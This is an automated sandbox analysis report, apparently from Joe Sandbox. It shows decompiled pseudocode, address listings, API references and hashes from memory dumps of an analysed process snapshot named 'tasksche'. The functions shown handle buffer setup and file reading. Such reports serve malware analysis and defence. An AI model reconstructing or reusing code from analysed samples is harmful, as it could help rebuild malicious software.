                                                                                              				 *((char*)(_t96 + 0xb05c)) = 0;
                                                                                              				 *((char*)(_t96 + 0xb065)) = 0;
                                                                                              				 *((char*)(_t96 + 0xb064)) = 0;
                                                                                              				 *((intOrPtr*)(_t96 + 0x6540)) = 0;
                                                                                              				 *((intOrPtr*)(_t96 + 0xb040)) = 0;
                                                                                              				 *((intOrPtr*)(_t96 + 0xb044)) = 0;
                                                                                              				 *((intOrPtr*)(_t96 + 0xb048)) = 0;
                                                                                              				 *((intOrPtr*)(_t96 + 0xb04c)) = 0;
                                                                                              				E0041A820(_t94, _t96 + 0x6570, 0, 0x40);
                                                                                              				E0041A820(_t94, _t96 + 0x65b0, 0, 0x34);
                                                                                              				E0041A820(_t94, _t96 + 0x88e8, 0, 0x20);
                                                                                              				 *((short*)(_t96 + 0xb09a)) = 0;
                                                                                              				 *((intOrPtr*)(_t96 + 0xb078)) = 0;
                                                                                              				 *((intOrPtr*)(_t96 + 0xb080)) = 0;
                                                                                              				 *((intOrPtr*)(_t96 + 0xb084)) = 0;
                                                                                              				 *((intOrPtr*)(_t96 + 0xb088)) = 0;
                                                                                              				 *((intOrPtr*)(_t96 + 0xb08c)) = 0;
                                                                                              				 *((intOrPtr*)(_t96 + 0xb090)) = 0;
                                                                                              				 *((intOrPtr*)(_t96 + 0xb094)) = 0;
                                                                                              				 *((char*)(_t96 + 0xb076)) = 0;
                                                                                              				 *((char*)(_t96 + 0xb098)) = 0;
                                                                                              				 *((char*)(_t96 + 0x6548)) = 0;
                                                                                              				 *[fs:0x0] =  *((intOrPtr*)(_t98 - 0xc));
                                                                                              				return _t96;
                                                                                              			}













                                                                                              0x00401822
                                                                                              0x00401822
                                                                                              0x00401822
                                                                                              0x00401827
                                                                                              0x0040182c
                                                                                              0x0040182f
                                                                                              0x00401831
                                                                                              0x00401834
                                                                                              0x00401841
                                                                                              0x00401844
                                                                                              0x0040184a
                                                                                              0x00401855
                                                                                              0x00401859
                                                                                              0x00401864
                                                                                              0x0040186a
                                                                                              0x00401870
                                                                                              0x0040187b
                                                                                              0x00401883
                                                                                              0x00401887
                                                                                              0x0040188a
                                                                                              0x00401890
                                                                                              0x00401896
                                                                                              0x00401898
                                                                                              0x004018bd
                                                                                              0x0040189a
                                                                                              0x0040189a
                                                                                              0x0040189f
                                                                                              0x004018a5
                                                                                              0x004018a7
                                                                                              0x004018aa
                                                                                              0x004018b0
                                                                                              0x004018b9
                                                                                              0x004018b2
                                                                                              0x004018b2
                                                                                              0x004018b2
                                                                                              0x004018b0
                                                                                              0x004018c0
                                                                                              0x004018cc
                                                                                              0x004018d3
                                                                                              0x004018da
                                                                                              0x004018e3
                                                                                              0x004018ee
                                                                                              0x004018f8
                                                                                              0x004018fe
                                                                                              0x00401904
                                                                                              0x0040190a
                                                                                              0x00401910
                                                                                              0x00401916
                                                                                              0x0040191c
                                                                                              0x00401922
                                                                                              0x00401928
                                                                                              0x0040192e
                                                                                              0x00401934
                                                                                              0x0040193a
                                                                                              0x00401940
                                                                                              0x00401946
                                                                                              0x0040194c
                                                                                              0x00401952
                                                                                              0x00401958
                                                                                              0x0040195e
                                                                                              0x00401964
                                                                                              0x0040196a
                                                                                              0x00401979
                                                                                              0x00401988
                                                                                              0x00401995
                                                                                              0x0040199c
                                                                                              0x004019a2
                                                                                              0x004019a8
                                                                                              0x004019ae
                                                                                              0x004019b4
                                                                                              0x004019ba
                                                                                              0x004019c0
                                                                                              0x004019c6
                                                                                              0x004019cc
                                                                                              0x004019d2
                                                                                              0x004019dc
                                                                                              0x004019e4

                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00401827
                                                                                                • Part of subcall function 00405F3C: __EH_prolog.LIBCMT ref: 00405F41
                                                                                                • Part of subcall function 00405F3C: _memset.LIBCMT ref: 00405FA4
                                                                                                • Part of subcall function 00405F3C: _memset.LIBCMT ref: 00405FB0
                                                                                                • Part of subcall function 00405F3C: _memset.LIBCMT ref: 00405FCE
                                                                                                • Part of subcall function 0040B8E3: __EH_prolog.LIBCMT ref: 0040B8E8
                                                                                              • _memset.LIBCMT ref: 0040196A
                                                                                              • _memset.LIBCMT ref: 00401979
                                                                                              • _memset.LIBCMT ref: 00401988
                                                                                                • Part of subcall function 0041A89A: _malloc.LIBCMT ref: 0041A8B4
                                                                                                • Part of subcall function 0040A026: __EH_prolog.LIBCMT ref: 0040A02B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memset$H_prolog$_malloc
                                                                                              • String ID:
                                                                                              • API String ID: 4233843809-0
                                                                                              • Opcode ID: 89f10ec8c43f5c59ed1e48a3837198038f2aefdd0a2d009fb04471144bad9c18
                                                                                              • Instruction ID: 211b101a5e2dbba32f2c8dae62910ed897794103f7d8a7f2ed724c9505602145
                                                                                              • Opcode Fuzzy Hash: 89f10ec8c43f5c59ed1e48a3837198038f2aefdd0a2d009fb04471144bad9c18
                                                                                              • Instruction Fuzzy Hash: 865127B1445F809EC321DF7988916D7FFE0AF29314F84496E91FE93282D7352658CB29
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 49%
                                                                                              			E00413CE8(void* __ecx, void* __edx) {
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				intOrPtr _t34;
                                                                                              				signed int _t35;
                                                                                              				signed int* _t41;
                                                                                              				signed int _t42;
                                                                                              				signed int _t44;
                                                                                              				intOrPtr _t46;
                                                                                              				void* _t67;
                                                                                              				signed int _t72;
                                                                                              				intOrPtr* _t73;
                                                                                              				void* _t75;
                                                                                              				void* _t77;
                                                                                              				signed int _t81;
                                                                                              
                                                                                              				_t34 = E0041A4DC(E0042980D, _t75);
                                                                                              				_push(__ecx);
                                                                                              				_push(__ecx);
                                                                                              				_t67 = __ecx;
                                                                                              				_t80 =  *((intOrPtr*)(__ecx + 0x20));
                                                                                              				if( *((intOrPtr*)(__ecx + 0x20)) == 0) {
                                                                                              					_push(0x400400); // executed
                                                                                              					_t46 = E0041A0EA(0, __edx, __ecx, _t80); // executed
                                                                                              					 *((intOrPtr*)(_t67 + 0x20)) = _t46;
                                                                                              					_t34 = E0041A820(_t67, _t46, 0, 0x400400);
                                                                                              					_t77 = _t77 + 0x10;
                                                                                              				}
                                                                                              				_t81 =  *(_t67 + 0x18);
                                                                                              				if(_t81 != 0) {
                                                                                              					L12:
                                                                                              					 *[fs:0x0] =  *((intOrPtr*)(_t75 - 0xc));
                                                                                              					return _t34;
                                                                                              				} else {
                                                                                              					_t72 =  *((intOrPtr*)(_t67 + 0x1c)) +  *((intOrPtr*)(_t67 + 0x1c));
                                                                                              					_t35 = _t72;
                                                                                              					_t65 = _t35 * 0x4ae4 >> 0x20;
                                                                                              					_push( ~(0 | _t81 > 0x00000000) | ( ~(0 | _t81 > 0x00000000) | _t35 * 0x00004ae4) + 0x00000004); // executed
                                                                                              					_t41 = E0041A0EA(0x4ae4, _t35 * 0x4ae4 >> 0x20, _t67, _t81); // executed
                                                                                              					 *(_t75 - 0x10) = _t41;
                                                                                              					 *(_t75 - 4) =  *(_t75 - 4) & 0x00000000;
                                                                                              					_t82 = _t41;
                                                                                              					if(_t41 == 0) {
                                                                                              						_t42 = 0;
                                                                                              						__eflags = 0;
                                                                                              					} else {
                                                                                              						_push(E00412B7D);
                                                                                              						_push(E00412B65);
                                                                                              						_push(_t72);
                                                                                              						 *_t41 = _t72;
                                                                                              						_t44 =  &(_t41[1]);
                                                                                              						_push(0x4ae4);
                                                                                              						_push(_t44);
                                                                                              						 *(_t75 - 0x14) = _t44;
                                                                                              						E0041C6B6(_t72, _t82);
                                                                                              						_t42 =  *(_t75 - 0x14);
                                                                                              					}
                                                                                              					 *(_t75 - 4) =  *(_t75 - 4) | 0xffffffff;
                                                                                              					 *(_t67 + 0x18) = _t42;
                                                                                              					_t34 = E0041A820(_t67, _t42, 0, _t72 * 0x4ae4);
                                                                                              					if(_t72 > 0) {
                                                                                              						 *(_t75 - 0x10) =  *(_t75 - 0x10) & 0x00000000;
                                                                                              						 *(_t75 - 0x14) = _t72;
                                                                                              						do {
                                                                                              							_t34 =  *(_t67 + 0x18) +  *(_t75 - 0x10);
                                                                                              							_t26 = _t34 + 0x4ad4; // 0x4ad4
                                                                                              							_t73 = _t26;
                                                                                              							if( *_t73 == 0) {
                                                                                              								 *((intOrPtr*)(_t34 + 0x4adc)) = 0x4100;
                                                                                              								_t34 = E0041CF3E(0x4ae4, _t65, _t67, 0x30c00); // executed
                                                                                              								 *_t73 = _t34;
                                                                                              								if(_t34 == 0) {
                                                                                              									_t34 = E004063CE(0x4335ac);
                                                                                              								}
                                                                                              							}
                                                                                              							 *(_t75 - 0x10) =  *(_t75 - 0x10) + 0x4ae4;
                                                                                              							_t30 = _t75 - 0x14;
                                                                                              							 *_t30 =  *(_t75 - 0x14) - 1;
                                                                                              						} while ( *_t30 != 0);
                                                                                              					}
                                                                                              					goto L12;
                                                                                              				}
                                                                                              			}


















                                                                                              0x00413ced
                                                                                              0x00413cf2
                                                                                              0x00413cf3
                                                                                              0x00413cf7
                                                                                              0x00413cfb
                                                                                              0x00413cfe
                                                                                              0x00413d05
                                                                                              0x00413d06
                                                                                              0x00413d0e
                                                                                              0x00413d11
                                                                                              0x00413d16
                                                                                              0x00413d16
                                                                                              0x00413d19
                                                                                              0x00413d1c
                                                                                              0x00413dde
                                                                                              0x00413de4
                                                                                              0x00413dec
                                                                                              0x00413d22
                                                                                              0x00413d25
                                                                                              0x00413d2e
                                                                                              0x00413d32
                                                                                              0x00413d47
                                                                                              0x00413d48
                                                                                              0x00413d4e
                                                                                              0x00413d51
                                                                                              0x00413d55
                                                                                              0x00413d57
                                                                                              0x00413d78
                                                                                              0x00413d78
                                                                                              0x00413d59
                                                                                              0x00413d59
                                                                                              0x00413d5e
                                                                                              0x00413d63
                                                                                              0x00413d64
                                                                                              0x00413d66
                                                                                              0x00413d69
                                                                                              0x00413d6a
                                                                                              0x00413d6b
                                                                                              0x00413d6e
                                                                                              0x00413d73
                                                                                              0x00413d73
                                                                                              0x00413d7a
                                                                                              0x00413d8a
                                                                                              0x00413d8d
                                                                                              0x00413d97
                                                                                              0x00413d99
                                                                                              0x00413d9d
                                                                                              0x00413da0
                                                                                              0x00413da3
                                                                                              0x00413da6
                                                                                              0x00413da6
                                                                                              0x00413daf
                                                                                              0x00413db6
                                                                                              0x00413dc0
                                                                                              0x00413dc6
                                                                                              0x00413dca
                                                                                              0x00413dd1
                                                                                              0x00413dd1
                                                                                              0x00413dca
                                                                                              0x00413dd6
                                                                                              0x00413dd9
                                                                                              0x00413dd9
                                                                                              0x00413dd9
                                                                                              0x00413da0
                                                                                              0x00000000
                                                                                              0x00413d97

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memset$H_prolog_malloc
                                                                                              • String ID:
                                                                                              • API String ID: 1600808285-0
                                                                                              • Opcode ID: f9e7b2a6a83c73fc1ba99619ebe61da21776ee40c69ad0e57b9b97bafc6a76b5
                                                                                              • Instruction ID: 702ce421a693160a9893d7f58a622c69960126b9ff2eeb296b605b135dd4a1ff
                                                                                              • Opcode Fuzzy Hash: f9e7b2a6a83c73fc1ba99619ebe61da21776ee40c69ad0e57b9b97bafc6a76b5
                                                                                              • Instruction Fuzzy Hash: F831D4B1E01215ABDB14AF65D9057EB76A8FF14319F10013FE105E7281E7789E9087ED
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 59%
                                                                                              			E00408CA0(void* __ecx, void* _a4, long _a8) {
                                                                                              				long _v8;
                                                                                              				int _t14;
                                                                                              				signed int _t15;
                                                                                              				void* _t28;
                                                                                              
                                                                                              				_push(__ecx);
                                                                                              				_t28 = __ecx;
                                                                                              				if( *((intOrPtr*)(__ecx + 0xc)) == 1) {
                                                                                              					 *(_t28 + 4) = GetStdHandle(0xfffffff6);
                                                                                              				}
                                                                                              				_t14 = ReadFile( *(_t28 + 4), _a4, _a8,  &_v8, 0); // executed
                                                                                              				if(_t14 != 0) {
                                                                                              					_t15 = _v8;
                                                                                              				} else {
                                                                                              					_t16 = E00408C5A(_t28);
                                                                                              					if(_t16 == 0) {
                                                                                              						L7:
                                                                                              						if( *((intOrPtr*)(_t28 + 0xc)) != 1) {
                                                                                              							L10:
                                                                                              							if( *((intOrPtr*)(_t28 + 0xc)) != 0 || _a8 <= 0x8000) {
                                                                                              								L14:
                                                                                              								_t15 = _t16 | 0xffffffff;
                                                                                              							} else {
                                                                                              								_t16 = GetLastError();
                                                                                              								if(_t16 != 0x21) {
                                                                                              									goto L14;
                                                                                              								} else {
                                                                                              									_push(0x8000);
                                                                                              									goto L6;
                                                                                              								}
                                                                                              							}
                                                                                              						} else {
                                                                                              							_t16 = GetLastError();
                                                                                              							if(_t16 != 0x6d) {
                                                                                              								goto L10;
                                                                                              							} else {
                                                                                              								_t15 = 0;
                                                                                              							}
                                                                                              						}
                                                                                              					} else {
                                                                                              						_t16 = 0x4e20;
                                                                                              						if(_a8 <= 0x4e20) {
                                                                                              							goto L7;
                                                                                              						} else {
                                                                                              							_push(0x4e20);
                                                                                              							L6:
                                                                                              							_push(_a4);
                                                                                              							_t15 = E00408CA0(_t28);
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              				return _t15;
                                                                                              			}







                                                                                              0x00408ca3
                                                                                              0x00408ca6
                                                                                              0x00408cad
                                                                                              0x00408cb7
                                                                                              0x00408cb7
                                                                                              0x00408cc9
                                                                                              0x00408cd1
                                                                                              0x00408d2b
                                                                                              0x00408cd3
                                                                                              0x00408cd5
                                                                                              0x00408cdc
                                                                                              0x00408cf5
                                                                                              0x00408cff
                                                                                              0x00408d0c
                                                                                              0x00408d10
                                                                                              0x00408d26
                                                                                              0x00408d26
                                                                                              0x00408d1c
                                                                                              0x00408d1c
                                                                                              0x00408d21
                                                                                              0x00000000
                                                                                              0x00408d23
                                                                                              0x00408d23
                                                                                              0x00000000
                                                                                              0x00408d23
                                                                                              0x00408d21
                                                                                              0x00408d01
                                                                                              0x00408d01
                                                                                              0x00408d06
                                                                                              0x00000000
                                                                                              0x00408d08
                                                                                              0x00408d08
                                                                                              0x00408d08
                                                                                              0x00408d06
                                                                                              0x00408cde
                                                                                              0x00408cde
                                                                                              0x00408ce6
                                                                                              0x00000000
                                                                                              0x00408ce8
                                                                                              0x00408ce8
                                                                                              0x00408ce9
                                                                                              0x00408ce9
                                                                                              0x00408cee
                                                                                              0x00408cee
                                                                                              0x00408ce6
                                                                                              0x00408cdc
                                                                                              0x00408d32

                                                                                              APIs
                                                                                              • GetStdHandle.KERNEL32(000000F6,004335AC,?,00000000,?,?,00408EB0,?,00000000,?,?,00000000), ref: 00408CB1
                                                                                              • ReadFile.KERNELBASE(?,?,?,00000000,00000000,004335AC,?,00000000,?,?,00408EB0,?,00000000,?,?,00000000), ref: 00408CC9
                                                                                              • GetLastError.KERNEL32(?,00408EB0,?,00000000,?,?,00000000), ref: 00408D01
                                                                                              • GetLastError.KERNEL32(?,00408EB0,?,00000000,?,?,00000000), ref: 00408D1C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$FileHandleRead
                                                                                              • String ID:
                                                                                              • API String ID: 2244327787-0
                                                                                              • Opcode ID: c1fed62a9ea2a8515d50b02984c21f09fd940ae1629289a4c1ded04f954c3d6f
                                                                                              • Instruction ID: b149f771e66fe820b49a3db0cdc04a66bbf6f60059da98a6e892905e95da3d99
                                                                                              • Opcode Fuzzy Hash: c1fed62a9ea2a8515d50b02984c21f09fd940ae1629289a4c1ded04f954c3d6f
                                                                                              • Instruction Fuzzy Hash: B411A734504608EFEB205B50DA4096A37A8FF71374B10863FE996A52D1DE3DCD41DF2A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 83%
                                                                                              			E004076AA(intOrPtr __ecx, intOrPtr __edx) {
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				signed int _t349;
                                                                                              				signed int _t354;
                                                                                              				signed int _t359;
                                                                                              				signed int _t363;
                                                                                              				char _t364;
                                                                                              				intOrPtr _t367;
                                                                                              				signed int _t370;
                                                                                              				char _t373;
                                                                                              				void* _t375;
                                                                                              				signed int _t379;
                                                                                              				signed int _t380;
                                                                                              				intOrPtr _t383;
                                                                                              				char* _t386;
                                                                                              				signed int _t395;
                                                                                              				char _t398;
                                                                                              				intOrPtr _t399;
                                                                                              				intOrPtr _t407;
                                                                                              				signed int _t409;
                                                                                              				intOrPtr _t413;
                                                                                              				signed int _t423;
                                                                                              				intOrPtr _t426;
                                                                                              				char _t434;
                                                                                              				signed int _t440;
                                                                                              				signed int _t445;
                                                                                              				signed int _t446;
                                                                                              				signed int _t452;
                                                                                              				char _t456;
                                                                                              				intOrPtr _t459;
                                                                                              				intOrPtr _t462;
                                                                                              				signed int _t463;
                                                                                              				signed int _t469;
                                                                                              				signed int _t475;
                                                                                              				intOrPtr _t476;
                                                                                              				signed int _t479;
                                                                                              				signed int _t481;
                                                                                              				intOrPtr _t482;
                                                                                              				signed int _t484;
                                                                                              				signed int _t490;
                                                                                              				intOrPtr* _t500;
                                                                                              				char _t502;
                                                                                              				intOrPtr _t504;
                                                                                              				signed int _t510;
                                                                                              				signed int _t515;
                                                                                              				intOrPtr _t572;
                                                                                              				intOrPtr _t593;
                                                                                              				short* _t595;
                                                                                              				signed int _t602;
                                                                                              				signed int _t603;
                                                                                              				intOrPtr _t607;
                                                                                              				intOrPtr _t611;
                                                                                              				void* _t613;
                                                                                              
                                                                                              				_t585 = __edx;
                                                                                              				E0041A4DC(E004296C9, _t613);
                                                                                              				E0041AAF0(0x5194);
                                                                                              				_t500 =  *((intOrPtr*)(_t613 + 8));
                                                                                              				_t607 = __ecx;
                                                                                              				_t345 =  *( *((intOrPtr*)(__ecx + 8)) + 0x72b2) & 0x0000ffff;
                                                                                              				 *((intOrPtr*)(_t613 - 0x24)) = __ecx;
                                                                                              				 *(_t613 - 0x18) =  *( *((intOrPtr*)(__ecx + 8)) + 0x72b2) & 0x0000ffff;
                                                                                              				if( *((intOrPtr*)(_t613 + 0xc)) != 0) {
                                                                                              					L5:
                                                                                              					_t593 =  *((intOrPtr*)(_t500 + 0x6544));
                                                                                              					__eflags = _t593 - 2;
                                                                                              					if(_t593 == 2) {
                                                                                              						_t504 =  *((intOrPtr*)(_t607 + 8));
                                                                                              						 *((char*)(_t607 + 0x545d)) = 0;
                                                                                              						__eflags =  *(_t504 + 0x515c);
                                                                                              						if( *(_t504 + 0x515c) != 0) {
                                                                                              							L20:
                                                                                              							 *((char*)(_t613 - 0x10)) = 0;
                                                                                              							_t349 = E0040545B(_t504, _t500 + 0x65e8, _t613 - 0x10, 5, _t613 - 0x51a0, 0x800);
                                                                                              							__eflags = _t349;
                                                                                              							 *(_t613 - 0xe) = _t349 != 0;
                                                                                              							__eflags =  *(_t613 - 0xe);
                                                                                              							if( *(_t613 - 0xe) != 0) {
                                                                                              								__eflags =  *((char*)(_t613 - 0x10));
                                                                                              								if( *((char*)(_t613 - 0x10)) == 0) {
                                                                                              									 *((char*)(_t607 + 0x4459)) = 0;
                                                                                              								}
                                                                                              							}
                                                                                              							E00401A5C(_t500);
                                                                                              							E0040A618(_t607, _t500 + 0x6608, _t613 - 0x2158);
                                                                                              							__eflags =  *((char*)(_t500 + 0x76cb));
                                                                                              							if( *((char*)(_t500 + 0x76cb)) == 0) {
                                                                                              								_t354 = E00401A55(_t500);
                                                                                              								__eflags = _t354;
                                                                                              								if(_t354 != 0) {
                                                                                              									L33:
                                                                                              									 *((char*)(_t607 + 0x21d7)) =  *((intOrPtr*)(_t500 + 0x7671));
                                                                                              									 *((char*)(_t607 + 0x21d8)) = 0;
                                                                                              									_t586 =  *((intOrPtr*)(_t500 + 0xb04c));
                                                                                              									asm("sbb edx, [ebx+0x7634]");
                                                                                              									 *((intOrPtr*)( *_t500 + 0xc))( *((intOrPtr*)(_t500 + 0xb048)) -  *(_t500 + 0x7630),  *((intOrPtr*)(_t500 + 0xb04c)), 0);
                                                                                              									__eflags =  *(_t613 - 0xe);
                                                                                              									 *((char*)(_t613 + 0xf)) = 0;
                                                                                              									 *((char*)(_t613 - 0x1d)) = 0;
                                                                                              									if( *(_t613 - 0xe) != 0) {
                                                                                              										L35:
                                                                                              										_t359 =  *((intOrPtr*)( *((intOrPtr*)(_t607 + 8)) + 0x51c1));
                                                                                              										__eflags = _t359;
                                                                                              										if(_t359 == 0) {
                                                                                              											L38:
                                                                                              											_t510 = 0;
                                                                                              											__eflags = 0;
                                                                                              											L39:
                                                                                              											__eflags = _t359;
                                                                                              											_t363 = L004116E5(_t510, _t613 - 0x2158, (_t359 & 0xffffff00 | _t359 == 0x00000000) & 0x000000ff, _t510,  *((intOrPtr*)(_t613 - 0x1d))); // executed
                                                                                              											__eflags = _t363;
                                                                                              											if(__eflags == 0) {
                                                                                              												L191:
                                                                                              												_t364 = 0;
                                                                                              												L15:
                                                                                              												L16:
                                                                                              												 *[fs:0x0] =  *((intOrPtr*)(_t613 - 0xc));
                                                                                              												return _t364;
                                                                                              											}
                                                                                              											_t595 = _t607 + 0x545e;
                                                                                              											E00406F23(_t607, __eflags, _t500, _t613 - 0x2158, _t595, 0x800);
                                                                                              											__eflags =  *((char*)(_t613 - 0x1d));
                                                                                              											if( *((char*)(_t613 - 0x1d)) != 0) {
                                                                                              												L43:
                                                                                              												 *((char*)(_t613 + 0xf)) = 0;
                                                                                              												L44:
                                                                                              												_t367 =  *((intOrPtr*)(_t607 + 8));
                                                                                              												__eflags =  *((char*)(_t367 + 0x5153));
                                                                                              												if( *((char*)(_t367 + 0x5153)) != 0) {
                                                                                              													L46:
                                                                                              													__eflags =  *(_t613 - 0x18) - 0x45;
                                                                                              													if( *(_t613 - 0x18) == 0x45) {
                                                                                              														L48:
                                                                                              														E004067E1(_t613 - 0x31a0);
                                                                                              														_push(0);
                                                                                              														_t370 = E004096BC(_t586, _t595, _t613 - 0x31a0);
                                                                                              														__eflags = _t370;
                                                                                              														if(_t370 == 0) {
                                                                                              															__eflags =  *((char*)( *((intOrPtr*)(_t607 + 8)) + 0x5153));
                                                                                              															L53:
                                                                                              															if(__eflags == 0) {
                                                                                              																L55:
                                                                                              																__eflags =  *((char*)(_t500 + 0x7673));
                                                                                              																if( *((char*)(_t500 + 0x7673)) == 0) {
                                                                                              																	L60:
                                                                                              																	_t373 = E00407650(_t500, _t613 - 0x2158);
                                                                                              																	__eflags = _t373;
                                                                                              																	if(_t373 == 0) {
                                                                                              																		 *((char*)(_t613 + 0xf)) = _t373;
                                                                                              																		E004062BA(0x4335ac, 2);
                                                                                              																	}
                                                                                              																	_t515 = 0x40;
                                                                                              																	_t375 = memcpy(_t613 - 0x134,  *((intOrPtr*)( *((intOrPtr*)(_t613 - 0x24)) + 8)) + 0x4024, _t515 << 2);
                                                                                              																	asm("movsw");
                                                                                              																	 *(_t613 - 4) =  *(_t613 - 4) & 0x00000000;
                                                                                              																	asm("sbb edx, edx");
                                                                                              																	_t590 =  ~( *(_t500 + 0x7678) & 0x000000ff) & _t500 + 0x00007679;
                                                                                              																	 *((intOrPtr*)(_t613 - 0x28)) = _t375 + 0x10;
                                                                                              																	E0040B883(_t375 + 0x10, 0,  *((intOrPtr*)(_t500 + 0x7674)), _t613 - 0x134,  ~( *(_t500 + 0x7678) & 0x000000ff) & _t500 + 0x00007679, _t500 + 0x7689,  *((intOrPtr*)(_t500 + 0x76c4)), _t500 + 0x76a3, _t613 - 0x30);
                                                                                              																	__eflags =  *((char*)(_t500 + 0x7673));
                                                                                              																	if( *((char*)(_t500 + 0x7673)) != 0) {
                                                                                              																		__eflags =  *((char*)(_t500 + 0x7699));
                                                                                              																		if( *((char*)(_t500 + 0x7699)) != 0) {
                                                                                              																			_t469 = E0041AC04(_t500 + 0x769a, _t613 - 0x30, 8);
                                                                                              																			__eflags = _t469;
                                                                                              																			if(_t469 != 0) {
                                                                                              																				__eflags =  *((char*)(_t500 + 0xb064));
                                                                                              																				if( *((char*)(_t500 + 0xb064)) == 0) {
                                                                                              																					E00406376(6, _t500 + 0x1e);
                                                                                              																					E004062BA(0x4335ac, 0xb);
                                                                                              																					 *((char*)(_t613 + 0xf)) = 0;
                                                                                              																				}
                                                                                              																			}
                                                                                              																		}
                                                                                              																	}
                                                                                              																	_t522 = _t613 - 0x1158;
                                                                                              																	E00408786(_t613 - 0x1158);
                                                                                              																	_t379 =  *(_t500 + 0x76d8);
                                                                                              																	__eflags = _t379;
                                                                                              																	 *((char*)(_t613 - 0x11)) = _t379 != 0;
                                                                                              																	__eflags =  *((char*)(_t613 - 0x11));
                                                                                              																	 *(_t613 - 4) = 1;
                                                                                              																	if( *((char*)(_t613 - 0x11)) == 0) {
                                                                                              																		L77:
                                                                                              																		_t522 = _t500;
                                                                                              																		_t380 = E00401A55(_t500);
                                                                                              																		__eflags = _t380;
                                                                                              																		if(_t380 == 0) {
                                                                                              																			__eflags =  *((char*)(_t613 + 0xf));
                                                                                              																			if( *((char*)(_t613 + 0xf)) == 0) {
                                                                                              																				goto L90;
                                                                                              																			}
                                                                                              																			_t611 =  *((intOrPtr*)(_t613 - 0x24));
                                                                                              																			_t522 = _t611; // executed
                                                                                              																			_t456 = E0040753D(_t611, _t500, _t613 - 0x1158); // executed
                                                                                              																			 *((char*)(_t613 + 0xf)) = _t456;
                                                                                              																			goto L88;
                                                                                              																		}
                                                                                              																		__eflags =  *((char*)(_t613 + 0xf));
                                                                                              																		if( *((char*)(_t613 + 0xf)) == 0) {
                                                                                              																			L85:
                                                                                              																			 *(_t613 - 4) = 0;
                                                                                              																			E00408C7D(_t500, _t613 - 0x1158);
                                                                                              																			 *(_t613 - 4) =  *(_t613 - 4) | 0xffffffff;
                                                                                              																			E0040D111(_t613 - 0x134);
                                                                                              																			goto L14;
                                                                                              																		}
                                                                                              																		__eflags =  *(_t613 - 0x18) - 0x50;
                                                                                              																		if( *(_t613 - 0x18) == 0x50) {
                                                                                              																			goto L85;
                                                                                              																		}
                                                                                              																		__eflags =  *(_t613 - 0x18) - 0x49;
                                                                                              																		if( *(_t613 - 0x18) == 0x49) {
                                                                                              																			goto L85;
                                                                                              																		}
                                                                                              																		__eflags =  *(_t613 - 0x18) - 0x45;
                                                                                              																		if( *(_t613 - 0x18) == 0x45) {
                                                                                              																			goto L85;
                                                                                              																		}
                                                                                              																		_t572 =  *((intOrPtr*)(_t613 - 0x24));
                                                                                              																		_t459 =  *((intOrPtr*)(_t572 + 8));
                                                                                              																		__eflags =  *((intOrPtr*)(_t459 + 0x5158)) - 1;
                                                                                              																		if( *((intOrPtr*)(_t459 + 0x5158)) == 1) {
                                                                                              																			goto L85;
                                                                                              																		}
                                                                                              																		_t143 = _t572 + 0x444c;
